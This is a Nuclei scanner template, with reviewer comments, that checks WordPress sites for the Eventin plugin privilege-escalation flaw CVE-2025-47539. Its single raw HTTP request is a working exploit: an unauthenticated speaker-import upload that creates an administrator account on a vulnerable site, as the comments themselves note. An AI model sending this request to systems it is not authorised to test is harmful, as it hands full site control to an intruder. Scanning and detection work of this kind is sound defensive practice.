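# Nuclei template for CVE-2025-47539 (Eventin <= 4.0.26 for WordPress).
# This is an active check, not a passive fingerprint: the single request it
# sends exercises the vulnerable import endpoint and, when the target is
# vulnerable, changes state on the target (see the note on the http block).
id: CVE-2025-47539

info:
  name: Eventin <= 4.0.26 - Privilege Escalation
  author: pdresearch
  severity: critical
  description: |
    The Eventin WordPress plugin before 4.0.27 suffers from an unauthenticated
    privilege escalation vulnerability. Due to a missing permission check in a
    REST API endpoint, unauthenticated attackers can import users with arbitrary
    roles, including administrator, leading to full site compromise.
  impact: |
    Unauthenticated attackers can import users with arbitrary roles including
    administrator through a missing permission check in the REST API, leading to
    full site compromise.
  remediation: |
    Upgrade the Eventin WordPress plugin to version 4.0.27 or later, which
    implements proper permission checks on the user import endpoints.
  reference:
    - https://patchstack.com/database/vulnerability/eventin/wordpress-eventin-plugin-4-0-26-unauthenticated-privilege-escalation-vulnerability
    - https://themewinter.com/eventin/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-47539
  classification:
    epss-score: 0.27898
    epss-percentile: 0.96555
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47539
    cwe-id: CWE-269
  metadata:
    verified: true
    max-request: 1
    vendor: themewinter
    product: eventin
    fofa-query: body="/wp-content/plugins/eventin"
  tags: cve,cve2025,wordpress,wp,wp-plugin,eventin,vkev,vuln

variables:
  # Random 5-character token; used as the imported record's display name and
  # as the local part of its email address.
  name: "{{randbase(5)}}"
  # Static domain used only to build that email address. No out-of-band
  # interaction is awaited: the matchers below inspect the HTTP response only.
  oast: "oast.fun"

http:
  # NOTE(review): a successful run is not side-effect free. The imported record
  # carries "role": "administrator", so per the description above a vulnerable
  # target ends up with a new administrator account whose address is
  # {{name}}@{{oast}}; the extractor prints that address so the account can be
  # located and removed after the check.
  # Defender signals visible in this request: an unauthenticated
  # POST /wp-json/eventin/v2/speakers/import carrying a speakers.json upload,
  # and newly created administrator users whose email ends in @oast.fun.
  - raw:
      - |
        POST /wp-json/eventin/v2/speakers/import?_locale=user HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryS5Gx6VCxm3HMV2A9

        ------WebKitFormBoundaryS5Gx6VCxm3HMV2A9
        Content-Disposition: form-data; name="speaker_import"; filename="speakers.json"
        Content-Type: application/json

        [ { "id": "999", "name": "{{name}}", "email": "{{name}}@{{oast}}", "image": "", "designation": "test", "summary": "", "social": [ [] ], "company_logo": "", "company_url": "", "speaker_group": "", "speaker_category": [ "speaker" ], "company_name": "", "author_url": "",
        "role": "administrator" } ]
        ------WebKitFormBoundaryS5Gx6VCxm3HMV2A9--

    # All three conditions must hold (condition: and): the plugin's success
    # message, a JSON content type and a 200 status.
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Successfully imported speaker")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

    # Reports the email address assigned to the imported account so the test
    # artefact can be identified in the target's user list and cleaned up.
    extractors:
      - type: dsl
        dsl:
          - '"Email: " + name + "@" + oast'
# NOTE(review): the digest below was computed over the original template text;
# the comments and wording fixes in this copy mean it will not verify until the
# template is re-signed.
# digest: 4b0a00483046022100e7e2b90a1aa49f18795cbbbf0af7864dc4c41ff1fe06c30b38983053686ac482022100ad5d9d4da5626d776e217f77c8225e7d972e0b11047d27c2d5d9a9d49b62755e:922c64590222798bb761d5b6d8e72950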